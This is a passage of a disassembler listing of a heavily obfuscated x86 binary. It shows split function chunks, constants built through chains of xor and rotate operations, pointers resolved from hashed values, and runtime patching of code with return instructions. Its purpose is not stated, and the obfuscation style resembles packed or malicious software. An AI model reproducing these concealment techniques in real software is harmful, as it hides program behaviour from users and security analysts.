loc_442983:				; CODE XREF: y2kk37jd:0044CCD3j
		jmp	nullsub_18
; ---------------------------------------------------------------------------

loc_442988:				; CODE XREF: y2kk37jd:0044B002j
		mov	eax, [ebp-1Ch]
		jmp	loc_4516E0
; ---------------------------------------------------------------------------
		test	ecx, ebx
		jmp	loc_4408F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B08

loc_442997:				; CODE XREF: sub_455B08-A192j
		xor	eax, ecx

loc_442999:				; CODE XREF: y2kk37jd:loc_4542C0j
		mov	eax, [esp+0]
		push	offset sub_4543B8
		jmp	nullsub_438
; END OF FUNCTION CHUNK	FOR sub_455B08
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_4429A6:				; CODE XREF: sub_45689F-602Aj
		and	eax, ds:4000EDh
		or	eax, 0EC47C4D8h
		call	sub_445B38

loc_4429B7:				; CODE XREF: sub_44479B-71E9j
		jge	loc_45A8DB
		jmp	loc_43DB94
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
		mov	eax, 0D372DA5Dh
		call	sub_442C3E
		mov	ds:off_41E184, eax
		lea	eax, loc_447C6F
		jmp	loc_45A000

; =============== S U B	R O U T	I N E =======================================



sub_4429DD	proc near		; CODE XREF: sub_44B7DB+Ap
					; y2kk37jd:0045ABB6j

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043B9A0 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043D32B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043F479 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044188D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442943 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004429EF SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443FD5 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 004441A7 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00446826 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448282 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448616 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004489CE SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00448B33 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004491DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A151 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044B008 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D4BB SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044E5B9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044F4D8 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044FAA5 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00451C39 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452235 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004528A2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004547C1 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00455427 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00455AB5 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00457352 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458AF2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045BE3C SIZE 0000001B BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		lea	eax, loc_455AB5
		mov	byte ptr [eax],	0C3h
		jmp	loc_448282
sub_4429DD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_4429EF:				; CODE XREF: sub_4429DD+130D9j
		mov	eax, [esp-4+arg_0]
		jmp	loc_457352
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454B16

loc_4429F7:				; CODE XREF: sub_454B16+4C62j
		xchg	ebp, [edx]

loc_4429F9:				; CODE XREF: sub_454B16:loc_44CDB3j
		push	eax
		lea	eax, loc_4476C0
		push	eax
		jmp	loc_454C6E
; END OF FUNCTION CHUNK	FOR sub_454B16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_442A06:				; CODE XREF: sub_45B7AA:loc_4512A8j
		cmp	dword ptr [ebp-4], 3
		jnz	loc_4533E7
		jmp	loc_440810
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
		add	edi, edx
		jmp	sub_44DC38
; ---------------------------------------------------------------------------

loc_442A1C:				; DATA XREF: sub_456CD8+Bo
		push	0
		call	sub_44EA91
		push	0FFFFFFFFh
		push	edx
		push	0BEE6B7F5h
		jmp	loc_44A4F4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44131E

loc_442A30:				; CODE XREF: sub_44131E+70B6j
		mov	eax, ecx
		xchg	eax, [esp-4+arg_0]
		mov	ecx, edx
		xchg	ecx, [esp-4+arg_0]
		push	edi
		push	offset sub_44918E
		jmp	loc_44FB7D
; END OF FUNCTION CHUNK	FOR sub_44131E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_442A45:				; CODE XREF: sub_445568:loc_445B12j
		pushf
		push	10B899Fh
		pop	edi
		add	edi, 0E3E7D415h
		jmp	loc_43C9A3
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_442A57:				; CODE XREF: sub_43ED86:loc_450835j
		rol	eax, 14h
		add	eax, 8879597Bh
		jmp	loc_4555A8
; ---------------------------------------------------------------------------

loc_442A65:				; CODE XREF: sub_43ED86j
		mov	eax, ds:dword_455490
		or	eax, eax
		jnz	loc_4418DD
		jmp	loc_43BA39
; END OF FUNCTION CHUNK	FOR sub_43ED86

; =============== S U B	R O U T	I N E =======================================



sub_442A78	proc near		; DATA XREF: sub_447DB2+3o
		push	eax
		retn
sub_442A78	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445E1C

loc_442A7A:				; CODE XREF: sub_445E1C+7C5Bj
		jmp	nullsub_517
; END OF FUNCTION CHUNK	FOR sub_445E1C
; ---------------------------------------------------------------------------

loc_442A7F:				; CODE XREF: y2kk37jd:00441630j
		jmp	loc_446977

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_442A84	proc near		; CODE XREF: sub_453B38+4p
					; y2kk37jd:loc_45A80Ap

arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 0043ECFC SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043F24D SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0044008A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044079E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044095C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00441C58 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044280D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00448478 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00448560 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044AA6B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044BF65 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044CA30 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DD5D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E4F5 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00451A68 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004546C2 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004557D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455F12 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456638 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004598DE SIZE 00000023 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		cmp	ds:dword_4516B8, 0
		jmp	loc_44CA30
sub_442A84	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_442A94	proc near		; CODE XREF: sub_447F91-B404p
					; y2kk37jd:0044BC59j
		xchg	eax, [esp+0]
		pop	eax
		push	edx
		push	edi
		jmp	loc_43D7E6
sub_442A94	endp

; ---------------------------------------------------------------------------

loc_442A9F:				; CODE XREF: y2kk37jd:0043CB67j
		mov	word ptr [ebp-6], 0FFFFh
		jmp	loc_447492
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_442AAA:				; CODE XREF: sub_44AC89:loc_43B8AEj
		push	0BE912267h
		pop	eax
		rol	eax, 2
		sub	eax, 33AA4F85h
		add	eax, 6B204F3Fh
		rol	eax, 2
		jmp	loc_454CF7
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
		push	26CD822Ah
		pop	eax
		or	eax, 70F31C9Dh
		rol	eax, 14h
		sub	eax, 23B2EE08h
		xor	eax, 0F482F5CDh
		call	sub_442C3E
		mov	ds:off_41E09C, eax
		jmp	loc_45A1DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_442AF2:				; CODE XREF: sub_44594E:loc_44F8ADj
		jz	loc_44EE5C

loc_442AF8:				; CODE XREF: y2kk37jd:0044D02Fj
		jmp	loc_44301F
; END OF FUNCTION CHUNK	FOR sub_44594E
; ---------------------------------------------------------------------------

loc_442AFD:				; CODE XREF: y2kk37jd:0043F801j
		jmp	loc_44C4E0
; ---------------------------------------------------------------------------
		jbe	loc_4443BA
		xor	edi, 0D3B43104h
		or	eax, 0BDAB7970h
		jmp	loc_44EE5C
; ---------------------------------------------------------------------------
		or	eax, eax
		jnz	loc_45ACEB
		jmp	loc_4563FA

; =============== S U B	R O U T	I N E =======================================



sub_442B26	proc near		; DATA XREF: y2kk37jd:00457F8Do

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C404 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044BB93 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00452D9F SIZE 0000000E BYTES

		push	ebx
		push	5854366Eh
		pop	ebx
		xor	ebx, 0DDA76DC0h
		cmp	ebx, 7675E29Dh
		jmp	loc_43C404
sub_442B26	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_442B3E:				; CODE XREF: sub_448DCA:loc_443F1Dj
		push	edx
		call	sub_43C326
		mov	eax, 1C5E06BAh
		push	eax
		push	47231778h
		jmp	loc_43E4D5
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
		push	0E18B1E23h
		pop	edx
		or	edx, 1BA21C72h
		push	offset sub_445A2D
		jmp	locret_443B03
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E194
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_277. PRESS KEYPAD	"+" TO EXPAND]
		db 88h,	34h, 21h
		dd 8B5A0000h, 0E8522404h, 13069h, 4CC2B1B8h, 0C6ACE902h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424B0

loc_442B8A:				; CODE XREF: sub_4424B0+11D28j
		rol	ecx, 3
		jmp	loc_459C3F
; END OF FUNCTION CHUNK	FOR sub_4424B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_442B92:				; CODE XREF: sub_4411C3-A03j
		jnz	loc_44B9D3

loc_442B98:				; CODE XREF: y2kk37jd:0044E57Dj
		jmp	sub_453583
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_442B9D:				; CODE XREF: sub_44CDD5-A095j
		jmp	loc_43F226
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------
		pushf
		ror	eax, 2
		jmp	loc_44B9D3
; ---------------------------------------------------------------------------
		ror	eax, 4
		jmp	loc_441597
; ---------------------------------------------------------------------------

loc_442BB3:				; DATA XREF: sub_4595D8+93Ao
		push	esi
		mov	esi, eax
		xchg	esi, [esp]
		call	sub_4476EE
		push	ecx
		push	54D02493h
		pop	ecx
		add	ecx, 9F161B63h
		jmp	loc_4407C6
; ---------------------------------------------------------------------------

loc_442BD0:				; DATA XREF: y2kk37jd:00454BC1o
		jnz	loc_453CF5

loc_442BD6:				; CODE XREF: y2kk37jd:00450DFAj
		jmp	sub_443688
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443688

loc_442BDB:				; CODE XREF: sub_443688:loc_453CF5j
		push	eax
		push	0
		call	sub_4502C2
		jmp	loc_43BFCC
; END OF FUNCTION CHUNK	FOR sub_443688
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_442BE8:				; CODE XREF: sub_451A35:loc_44D1BBj
		jz	loc_4461EE
		jo	loc_43BFF4
		adc	edx, eax
		push	ebx
		jmp	loc_4461EE
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------
		mov	[ebp+0], eax
		jmp	sub_4474C5
; ---------------------------------------------------------------------------

loc_442C04:				; CODE XREF: y2kk37jd:00452421j
		jns	loc_45B161

; =============== S U B	R O U T	I N E =======================================



sub_442C0A	proc near		; CODE XREF: sub_453FBA-183A2p

; FUNCTION CHUNK AT 0043C5BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B3B0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004553EC SIZE 0000001A BYTES

		xchg	edx, [esp+0]
		pop	edx
		xor	ebx, 7ED1D42Eh
		xor	eax, ebx
		pop	ebx
		jmp	loc_43C5BE
sub_442C0A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554A3

loc_442C1C:				; CODE XREF: sub_4554A3j
		call	sub_440040
; END OF FUNCTION CHUNK	FOR sub_4554A3
; START	OF FUNCTION CHUNK FOR sub_44D1D4

loc_442C21:				; CODE XREF: sub_44D1D4:loc_4492DCj
		or	eax, 0E018F9F7h
		add	eax, 0F376545Eh
		call	sub_4591AE
; END OF FUNCTION CHUNK	FOR sub_44D1D4
; START	OF FUNCTION CHUNK FOR sub_43E049

loc_442C32:				; CODE XREF: sub_43E049+88C3j
		jmp	loc_43CFC8
; END OF FUNCTION CHUNK	FOR sub_43E049
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DC38

loc_442C37:				; CODE XREF: sub_44DC38:loc_4435D5j
		pop	eax
		pop	ebp
		jmp	loc_447737
; END OF FUNCTION CHUNK	FOR sub_44DC38

; =============== S U B	R O U T	I N E =======================================



sub_442C3E	proc near		; CODE XREF: sub_43B0BF+7j
					; sub_44036F-4B9Aj ...

; FUNCTION CHUNK AT 0045A926 SIZE 00000018 BYTES

		jnb	loc_44545B
		push	234BDA6Eh
		or	edx, edi
		jmp	loc_45A926
sub_442C3E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_442C50	proc near		; CODE XREF: y2kk37jd:00450649j
					; sub_451D89+9p
		xchg	eax, [esp+0]
		pop	eax
		pop	ecx
		jmp	sub_44E5E5
sub_442C50	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_442C5A:				; CODE XREF: y2kk37jd:0043B558j
		adc	edx, 0E9CDE8C0h
		shl	ebx, 3
		add	ecx, edx
		jmp	loc_448163
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441F5E

loc_442C6A:				; CODE XREF: sub_441F5E:loc_44CFD9j
		sub	edx, esi
		jmp	loc_44DB75
; END OF FUNCTION CHUNK	FOR sub_441F5E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446861

loc_442C71:				; CODE XREF: sub_446861+10278j
		add	eax, [ebp-4]
		xor	edx, edx
; END OF FUNCTION CHUNK	FOR sub_446861
; START	OF FUNCTION CHUNK FOR sub_453867

loc_442C76:				; CODE XREF: sub_453867-EE7Dj
		push	edx
		push	eax
		mov	eax, [ebp-18h]
		add	eax, eax
		jmp	loc_45B248
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF5F

loc_442C82:				; CODE XREF: sub_43BF5F+15j
		jz	loc_45A43C
		jmp	loc_440332
; END OF FUNCTION CHUNK	FOR sub_43BF5F
; ---------------------------------------------------------------------------

loc_442C8D:				; CODE XREF: y2kk37jd:004457AAj
		jno	loc_457EB1

loc_442C93:				; CODE XREF: y2kk37jd:00454F59j
		add	edi, 0E042F643h
		xchg	edi, [esp]
		jmp	loc_447A8A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_442CA1:				; CODE XREF: sub_449C4F+EDE2j
		jns	loc_453E32
		sbb	ecx, 0BFEC8A90h
		mov	[edx], edi
		js	loc_4479F6
		jmp	loc_43E351
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_442CBA:				; CODE XREF: sub_4553C1-1C54j
		sub	al, 99h
		mov	edx, [ebp+var_4]
		imul	byte ptr [edx]
		jmp	loc_449DDF
; END OF FUNCTION CHUNK	FOR sub_4553C1
; ---------------------------------------------------------------------------

loc_442CC6:				; CODE XREF: y2kk37jd:0045202Fj
		pushf
		not	esi
		cdq
		jmp	loc_447DD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F17

loc_442CCF:				; CODE XREF: sub_450F17+18j
		xor	eax, 0D79F2238h
		add	eax, 2848FC6Ch
		call	sub_454413
		jmp	loc_45B204
; END OF FUNCTION CHUNK	FOR sub_450F17
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F0A5

loc_442CE5:				; CODE XREF: sub_43F0A5:loc_45BADAj
		jno	loc_459A33
		push	edx
		jmp	loc_44F925
; END OF FUNCTION CHUNK	FOR sub_43F0A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_442CF1:				; CODE XREF: sub_4562E5:loc_45A8B8j
		jl	loc_43F3AC

loc_442CF7:				; CODE XREF: sub_45024B+A834j
		jmp	loc_4470F1
; END OF FUNCTION CHUNK	FOR sub_4562E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_442CFC:				; CODE XREF: sub_43B163+Fj
		jmp	loc_454073
; END OF FUNCTION CHUNK	FOR sub_43B163
; ---------------------------------------------------------------------------
		not	ecx
		and	esi, 36AD59D0h
		or	esi, 0D87D3C19h
		jmp	loc_43F3A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_442D14:				; CODE XREF: sub_43ED19+471Aj
		call	sub_44B24F

loc_442D19:				; CODE XREF: sub_440D56:loc_441FE2j
		push	27A98B34h
		xor	ecx, edx
		jmp	loc_44356C
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_442D25:				; CODE XREF: sub_44AC89+7E2Dj
		push	offset loc_447AAB
		jmp	nullsub_282
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_442D2F:				; CODE XREF: sub_448700-946Bj
		mov	eax, ecx

loc_442D31:				; CODE XREF: y2kk37jd:00443BE2j
		pop	eax
		jmp	loc_44CD32
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_442D37:				; CODE XREF: sub_44CDD5+Fj
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_442B9D
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457524

loc_442D45:				; CODE XREF: sub_457524:loc_43EA70j
		ror	edx, 0Bh
		push	ebp
		jno	loc_44887E
		jmp	loc_44C398
; END OF FUNCTION CHUNK	FOR sub_457524
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_442D54:				; CODE XREF: sub_4577FE+12j
					; y2kk37jd:00459F22j
		xor	eax, 0B7657CA9h
		add	eax, 0B779A0B4h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_44C971
		jmp	loc_453784
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451634

loc_442D6F:				; CODE XREF: sub_451634:loc_44BFC5j
		jz	loc_4451FD
		xchg	edi, [eax]
		jno	loc_43C0FD
		jle	loc_457989
		mov	edx, 5D5AA82Dh
		jmp	loc_43C24B
; END OF FUNCTION CHUNK	FOR sub_451634
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_442D8D:				; CODE XREF: sub_445226+88DBj
		jnz	loc_44D4E5
		jmp	loc_446F50
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_442D98:				; DATA XREF: sub_451711+7o
		mov	eax, [esp]
		push	edx
		call	sub_4553C1
		mov	eax, 0D504D785h
		call	sub_442C3E
		mov	ds:off_41E07C, eax
		lea	eax, sub_451711
		mov	byte ptr [eax],	0C3h
		jmp	loc_43BC4F
; ---------------------------------------------------------------------------
		mov	eax, 0CEEC89B4h
		push	ebp
		mov	ebp, esi
		xchg	ebp, [esp]
		push	0F1C42240h
		pop	esi
		jmp	loc_443CB9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_442DD5:				; CODE XREF: y2kk37jd:0043EF4Aj
					; sub_43F8B8+5D6j
		test	eax, ebx
		jmp	loc_446ADC
; END OF FUNCTION CHUNK	FOR sub_43F8B8

; =============== S U B	R O U T	I N E =======================================



sub_442DDC	proc near		; CODE XREF: sub_442F42:loc_43C17Dp
					; y2kk37jd:00453B72j

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043BFC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C8DB SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0043EAE1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444163 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004448DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445A5B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044739D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044792F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044AC6D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044F0B3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044F272 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044FBB7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00453D65 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455238 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045707E SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	0DF70A689h
		pop	esi
		jmp	loc_4448DD
sub_442DDC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_442DEB:				; CODE XREF: y2kk37jd:00451F1Cj
		shr	ebp, 1Dh
; START	OF FUNCTION CHUNK FOR sub_44438E

loc_442DEE:				; CODE XREF: sub_44438E:loc_451F0Bj
		add	ebx, 9DD92C70h
		xchg	ebx, [esp+0]
		jmp	sub_44113A
; END OF FUNCTION CHUNK	FOR sub_44438E
; ---------------------------------------------------------------------------
		push	esi
		push	0EF8B9103h
		jmp	loc_4404C7
; ---------------------------------------------------------------------------
		mov	eax, 11E35Ch
		call	sub_4425EC
; START	OF FUNCTION CHUNK FOR sub_44E5E5

loc_442E11:				; CODE XREF: sub_44E5E5:loc_4415AEj
		adc	eax, edx
		pushf
		add	ebx, edi
		add	esi, 80471B22h
		jmp	loc_43F1BE
; END OF FUNCTION CHUNK	FOR sub_44E5E5
; ---------------------------------------------------------------------------
		add	edx, ebx
		jmp	sub_45B491
; ---------------------------------------------------------------------------
		push	esi
		push	0FF7DB43Fh
		pop	esi
		and	esi, 56DFD409h
		jmp	loc_43BA4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_442E3A:				; CODE XREF: sub_43F8B8:loc_43D016j
		mov	edx, [ebp-18h]
		mov	[edx], eax
		jmp	loc_44F2A6
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_442E44:				; CODE XREF: sub_43C851:loc_452CE3j
		mov	eax, [ebp-24h]
		test	byte ptr [eax+1], 80h
		jnz	loc_44C1C8
		jmp	loc_43D0A0
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_442E56:				; CODE XREF: sub_45689F:loc_45129Cj
		jno	loc_4417D4
		pushf
		jmp	loc_449184
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------

loc_442E62:				; DATA XREF: sub_45598E:loc_44A13Ao
		add	eax, [ebp-4]
		add	eax, 18h
		mov	[ebp-10h], eax

loc_442E6B:				; CODE XREF: y2kk37jd:00446435j
		mov	eax, [ebp-10h]
		call	sub_451486
; START	OF FUNCTION CHUNK FOR sub_448658

loc_442E73:				; CODE XREF: sub_448658+11DD7j
		jmp	loc_457E76
; END OF FUNCTION CHUNK	FOR sub_448658

; =============== S U B	R O U T	I N E =======================================



sub_442E78	proc near		; CODE XREF: y2kk37jd:00456933j
					; y2kk37jd:004588BFp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004432CC SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	0C7100F33h
		pop	eax
		xor	eax, 38C0C419h
		sub	eax, 0EBE6FD4Dh
		add	eax, 0EC5B8F6Fh
		xchg	eax, [esp-4+arg_0]
		jmp	loc_4432CC
sub_442E78	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FB21

loc_442E9C:				; CODE XREF: sub_44FB21:loc_441D69j
		push	esi
		push	3A47D68h
		pop	esi
		or	esi, 0B0F38A96h
		cmp	esi, 33C87E70h
		jmp	loc_44196B
; END OF FUNCTION CHUNK	FOR sub_44FB21

; =============== S U B	R O U T	I N E =======================================



sub_442EB4	proc near		; CODE XREF: sub_445226:loc_43C060p
					; y2kk37jd:00442550j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D7AA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F170 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440082 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044826C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C033 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044EA5D SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044F3ED SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00452902 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00452E0B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A2E9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045A6EF SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44F3ED
		jmp	loc_43D7AA
sub_442EB4	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_151. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_442EC7:				; CODE XREF: sub_4458DD+70F1j
		jmp	loc_44D098
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------

loc_442ECC:				; CODE XREF: y2kk37jd:00443738j
		jmp	loc_44773C

; =============== S U B	R O U T	I N E =======================================



sub_442ED1	proc near		; CODE XREF: y2kk37jd:0044D297j
					; sub_4562E5+3p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043FF5A SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045BD75 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	ebx, [esp-4+arg_0]
		call	sub_447041
		push	298C6C44h
		xchg	edx, [esp+0]
		mov	eax, edx
		pop	edx
		jmp	loc_45BD75
sub_442ED1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441AAB

loc_442EED:				; CODE XREF: sub_441AAB:loc_441ABDj
		pop	eax
		add	edi, 3E2396BBh
		and	edi, 5B8EC478h
		sub	edi, 0F6266E89h
		or	edi, 70F8FCF6h
		jns	loc_457DBD
		or	ebx, edx
		jmp	loc_43B741
; END OF FUNCTION CHUNK	FOR sub_441AAB
; ---------------------------------------------------------------------------

loc_442F13:				; CODE XREF: y2kk37jd:0043B5D7j
		popf
		cmp	ecx, 0A8476549h
		jmp	loc_43E779
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_442F1F:				; CODE XREF: sub_4507BF:loc_44C9EAj
		jz	loc_445AA2
		jmp	loc_456982
; END OF FUNCTION CHUNK	FOR sub_4507BF

; =============== S U B	R O U T	I N E =======================================



